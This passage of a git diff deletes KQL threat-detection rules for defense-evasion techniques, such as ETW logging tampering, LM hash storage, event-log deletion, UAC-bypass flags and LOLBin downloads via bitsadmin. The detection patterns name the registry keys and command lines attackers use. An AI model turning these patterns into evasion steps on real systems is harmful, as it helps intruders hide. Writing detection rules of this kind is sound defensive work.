code on the fly and use it in other stages. -// Tags: attack.defense_evasion, attack.t1027.004 -DeviceProcessEvents -| where FolderPath endswith "\\csc.exe" and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp\\") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) or ProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or (InitiatingProcessFolderPath in~ ("C:\\ProgramData\\chocolatey\\choco.exe", "C:\\ProgramData\\chocolatey\\tools\\shimgen.exe")) or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection"))) \ No newline at end of file diff --git a/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql b/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql deleted file mode 100644 index 030bd66d..00000000 --- a/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2022/01/09 -// Level: low -// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process. -Certain processes are not typically observed compiling C# code, but can do so without touching disk. -This can be used to unpack a payload for execution - -// Tags: attack.defense_evasion, attack.t1027.004 -DeviceFileEvents -| where FolderPath endswith ".cmdline" \ No newline at end of file diff --git a/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql b/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql deleted file mode 100644 index 8766923b..00000000 --- a/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/09 -// Level: low -// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) -// Tags: attack.defense_evasion, attack.t1112, attack.t1562 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled" \ No newline at end of file diff --git a/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql b/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql deleted file mode 100644 index ec62c30a..00000000 --- a/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/09 -// Level: low -// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll -// Tags: attack.defense_evasion, attack.t1112, attack.t1562 -DeviceRegistryEvents -| where (RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation" \ No newline at end of file diff --git a/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql b/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql deleted file mode 100644 index 148555ce..00000000 --- a/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: high -// Description: Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. -// Tags: attack.defense_evasion, attack.t1562 -DeviceProcessEvents -| where ProcessCommandLine contains "COMPlus_ETWEnabled" or ProcessCommandLine contains "COMPlus_ETWFlags" \ No newline at end of file diff --git a/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql b/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql deleted file mode 100644 index ee7f0473..00000000 --- a/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: D3F7A5105 -// Date: 2023/01/02 -// Level: medium -// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. -This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. -Note that backup software and legitimate administrator might perform similar actions during troubleshooting. - -// Tags: attack.defense_evasion, attack.t1562.002 -DeviceFileEvents -| where FolderPath endswith ".evtx" and (not(((FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\") or FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\"))) \ No newline at end of file diff --git a/Defense Evasion/Enable_LM_Hash_Storage.kql b/Defense Evasion/Enable_LM_Hash_Storage.kql deleted file mode 100644 index 2ae9a54e..00000000 --- a/Defense Evasion/Enable_LM_Hash_Storage.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/12/15 -// Level: high -// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. -By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. - -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\NoLMHash" \ No newline at end of file diff --git a/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql b/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql deleted file mode 100644 index 3d5fa187..00000000 --- a/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/12/15 -// Level: high -// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. -By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. - -// Tags: attack.defense_evasion, attack.t1112 -DeviceProcessEvents -| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "NoLMHash" and ProcessCommandLine contains " 0" \ No newline at end of file diff --git a/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql b/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql deleted file mode 100644 index d6abdc89..00000000 --- a/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/17 -// Level: medium -// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests. -// Tags: attack.defense_evasion, attack.persistence -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles" \ No newline at end of file diff --git a/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql b/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql deleted file mode 100644 index 771adbd0..00000000 --- a/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/11/03 -// Level: medium -// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback" \ No newline at end of file diff --git a/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql b/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql deleted file mode 100644 index 37c43d0b..00000000 --- a/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops) -// Date: 2020/09/10 -// Level: medium -// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012 -DeviceRegistryEvents -| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH" \ No newline at end of file diff --git a/Defense Evasion/EventLog_EVTX_File_Deleted.kql b/Defense Evasion/EventLog_EVTX_File_Deleted.kql deleted file mode 100644 index 2e9420ac..00000000 --- a/Defense Evasion/EventLog_EVTX_File_Deleted.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/15 -// Level: medium -// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence -// Tags: attack.defense_evasion, attack.t1070 -DeviceFileEvents -| where FolderPath endswith ".evtx" and FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\" \ No newline at end of file diff --git a/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql b/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql deleted file mode 100644 index a124be21..00000000 --- a/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/26 -// Level: high -// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence -// Tags: attack.defense_evasion, attack.t1070 -DeviceFileEvents -| where FolderPath contains "_Cmdlet_" and FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\" \ No newline at end of file diff --git a/Defense Evasion/Execute_Code_with_Pester.bat.kql b/Defense Evasion/Execute_Code_with_Pester.bat.kql deleted file mode 100644 index 0676e78a..00000000 --- a/Defense Evasion/Execute_Code_with_Pester.bat.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Julia Fomina, oscd.community -// Date: 2020/10/08 -// Level: medium -// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?")) \ No newline at end of file diff --git a/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql b/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql deleted file mode 100644 index 7a116895..00000000 --- a/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali -// Date: 2022/08/20 -// Level: medium -// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql b/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql deleted file mode 100644 index b557d443..00000000 --- a/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community -// Date: 2020/10/18 -// Level: medium -// Description: Detects file execution using the msdeploy.exe lolbin -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "verb:sync" and ProcessCommandLine contains "-source:RunCommand" and ProcessCommandLine contains "-dest:runCommand") and FolderPath endswith "\\msdeploy.exe" \ No newline at end of file diff --git a/Defense Evasion/Execute_From_Alternate_Data_Streams.kql b/Defense Evasion/Execute_From_Alternate_Data_Streams.kql deleted file mode 100644 index 39de86ed..00000000 --- a/Defense Evasion/Execute_From_Alternate_Data_Streams.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/09/01 -// Level: medium -// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection -// Tags: attack.defense_evasion, attack.t1564.004 -DeviceProcessEvents -| where ProcessCommandLine contains "txt:" and ((ProcessCommandLine contains "esentutl " and ProcessCommandLine contains " /y " and ProcessCommandLine contains " /d " and ProcessCommandLine contains " /o ") or (ProcessCommandLine contains "makecab " and ProcessCommandLine contains ".cab") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains " export ") or (ProcessCommandLine contains "regedit " and ProcessCommandLine contains " /E ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > ")) \ No newline at end of file diff --git a/Defense Evasion/Execute_MSDT_Via_Answer_File.kql b/Defense Evasion/Execute_MSDT_Via_Answer_File.kql deleted file mode 100644 index 3ce729d9..00000000 --- a/Defense Evasion/Execute_MSDT_Via_Answer_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/13 -// Level: high -// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab) -// Tags: attack.defense_evasion, attack.t1218, attack.execution -DeviceProcessEvents -| where ((ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af ") and (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and FolderPath endswith "\\msdt.exe")) and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe")) \ No newline at end of file diff --git a/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql b/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql deleted file mode 100644 index b385a85e..00000000 --- a/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/13 -// Level: high -// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability -// Tags: attack.defense_evasion, attack.t1218, attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe" \ No newline at end of file diff --git a/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql b/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql deleted file mode 100644 index 03ab5746..00000000 --- a/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, Natalia Shornikova -// Date: 2020/10/13 -// Level: high -// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry. -// Tags: attack.defense_evasion, attack.t1218 -DeviceRegistryEvents -| where RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath" and (not(RegistryValueData =~ "%CommonProgramFiles%\\System\\wab32.dll")) \ No newline at end of file diff --git a/Defense Evasion/Execution_Of_Non-Existing_File.kql b/Defense Evasion/Execution_Of_Non-Existing_File.kql deleted file mode 100644 index 21d8dc22..00000000 --- a/Defense Evasion/Execution_Of_Non-Existing_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Max Altgelt (Nextron Systems) -// Date: 2021/12/09 -// Level: high -// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (not(FolderPath contains "\\")) and (not((((FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or (ProcessCommandLine in~ ("Registry", "MemCompression", "vmmem"))) or (FolderPath in~ ("-", "")) or isnull(FolderPath)))) \ No newline at end of file diff --git a/Defense Evasion/Execution_from_Suspicious_Folder.kql b/Defense Evasion/Execution_from_Suspicious_Folder.kql deleted file mode 100644 index 41e17b99..00000000 --- a/Defense Evasion/Execution_from_Suspicious_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Tim Shelton -// Date: 2019/01/16 -// Level: high -// Description: Detects a suspicious execution from an uncommon folder -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where ((FolderPath contains "\\$Recycle.bin\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Intel\\Logs\\" or FolderPath contains "\\RSA\\MachineKeys\\" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\NetworkService\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\addins\\" or FolderPath contains "\\Windows\\debug\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\Help\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\Media\\" or FolderPath contains "\\Windows\\repair\\" or FolderPath contains "\\Windows\\security\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\") or FolderPath startswith "C:\\Perflogs\\") and (not(((FolderPath endswith "\\CitrixReceiverUpdater.exe" and FolderPath startswith "C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\") or FolderPath startswith "C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\"))) \ No newline at end of file diff --git a/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql b/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql deleted file mode 100644 index 518a4a2d..00000000 --- a/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Max Altgelt (Nextron Systems) -// Date: 2021/12/09 -// Level: medium -// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. -This rule might require some initial baselining to align with some third party tooling in the user environment. - -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (not((FolderPath endswith ".bin" or FolderPath endswith ".cgi" or FolderPath endswith ".com" or FolderPath endswith ".exe" or FolderPath endswith ".scr" or FolderPath endswith ".tmp"))) and (not((FolderPath contains ":\\$Extend\\$Deleted\\" or FolderPath contains ":\\Windows\\System32\\DriverStore\\FileRepository\\" or (FolderPath in~ ("-", "")) or (FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or FolderPath contains ":\\Windows\\Installer\\MSI" or (FolderPath contains ":\\Config.Msi\\" and (FolderPath endswith ".rbf" or FolderPath endswith ".rbs")) or isnull(FolderPath) or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\")))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Avira\\" or (FolderPath endswith "com.docker.service" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe") or FolderPath contains ":\\Program Files\\Mozilla Firefox\\" or FolderPath endswith "\\LZMA_EXE" or (FolderPath endswith ":\\Program Files (x86)\\MyQ\\Server\\pcltool.dll" or FolderPath endswith ":\\Program Files\\MyQ\\Server\\pcltool.dll") or (FolderPath contains "NVIDIA\\NvBackend\\" and FolderPath endswith ".dat") or ((FolderPath contains ":\\Program Files (x86)\\WINPAKPRO\\" or FolderPath contains ":\\Program Files\\WINPAKPRO\\") and FolderPath endswith ".ngn") or (FolderPath contains "\\AppData\\Local\\Packages\\" and FolderPath contains "\\LocalState\\rootfs\\")))) \ No newline at end of file diff --git a/Defense Evasion/Execution_via_WorkFolders.exe.kql b/Defense Evasion/Execution_via_WorkFolders.exe.kql deleted file mode 100644 index aa865be5..00000000 --- a/Defense Evasion/Execution_via_WorkFolders.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Maxime Thiebaut (@0xThiebaut) -// Date: 2021/10/21 -// Level: high -// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (FolderPath endswith "\\control.exe" and InitiatingProcessFolderPath endswith "\\WorkFolders.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\control.exe")) \ No newline at end of file diff --git a/Defense Evasion/Execution_via_stordiag.exe.kql b/Defense Evasion/Execution_via_stordiag.exe.kql deleted file mode 100644 index 7bc49c98..00000000 --- a/Defense Evasion/Execution_via_stordiag.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Austin Songer (@austinsonger) -// Date: 2021/10/21 -// Level: high -// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ((FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\fltmc.exe") and InitiatingProcessFolderPath endswith "\\stordiag.exe") and (not((InitiatingProcessFolderPath startswith "c:\\windows\\system32\\" or InitiatingProcessFolderPath startswith "c:\\windows\\syswow64\\"))) \ No newline at end of file diff --git a/Defense Evasion/Explorer_NOUACCHECK_Flag.kql b/Defense Evasion/Explorer_NOUACCHECK_Flag.kql deleted file mode 100644 index f23f2ead..00000000 --- a/Defense Evasion/Explorer_NOUACCHECK_Flag.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/23 -// Level: high -// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks -// Tags: attack.defense_evasion, attack.t1548.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "/NOUACCHECK" and FolderPath endswith "\\explorer.exe") and (not((InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Explorer_Process_Tree_Break.kql b/Defense Evasion/Explorer_Process_Tree_Break.kql deleted file mode 100644 index 0193292f..00000000 --- a/Defense Evasion/Explorer_Process_Tree_Break.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber -// Date: 2019/06/29 -// Level: medium -// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, -which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" - -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where ProcessCommandLine contains "/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}" or (ProcessCommandLine contains "explorer.exe" and ProcessCommandLine contains " /root,") \ No newline at end of file diff --git a/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql b/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql deleted file mode 100644 index 30f379f3..00000000 --- a/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: NVISO -// Date: 2020/05/04 -// Level: high -// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. -// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\")) \ No newline at end of file diff --git a/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql b/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql deleted file mode 100644 index e6a60f52..00000000 --- a/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: medium -// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files. -// Tags: attack.defense_evasion, attack.t1070.004 -DeviceFileEvents -| where (FolderPath endswith ".AAA" or FolderPath endswith ".ZZZ") and (not(FolderPath endswith "\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa")) \ No newline at end of file diff --git a/Defense Evasion/File_Deletion_Via_Del.kql b/Defense Evasion/File_Deletion_Via_Del.kql deleted file mode 100644 index e572cd87..00000000 --- a/Defense Evasion/File_Deletion_Via_Del.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: frack113 -// Date: 2022/01/15 -// Level: low -// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files. -Adversaries may delete files left behind by the actions of their intrusion activity. -Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. -Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. - -// Tags: attack.defense_evasion, attack.t1070.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains " -f" or ProcessCommandLine contains " /f" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " -q" or ProcessCommandLine contains " /q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql b/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql deleted file mode 100644 index 7413072b..00000000 --- a/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: frack113 -// Date: 2021/07/13 -// Level: medium -// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\protocolhandler.exe" or ProcessVersionInfoOriginalFileName =~ "ProtocolHandler.exe") \ No newline at end of file diff --git a/Defense Evasion/File_Download_Via_Bitsadmin.kql b/Defense Evasion/File_Download_Via_Bitsadmin.kql deleted file mode 100644 index e877ea4a..00000000 --- a/Defense Evasion/File_Download_Via_Bitsadmin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Michael Haag, FPT.EagleEye -// Date: 2017/03/09 -// Level: medium -// Description: Detects usage of bitsadmin downloading a file -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http")) \ No newline at end of file diff --git a/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql b/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql deleted file mode 100644 index c7fb9c33..00000000 --- a/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian 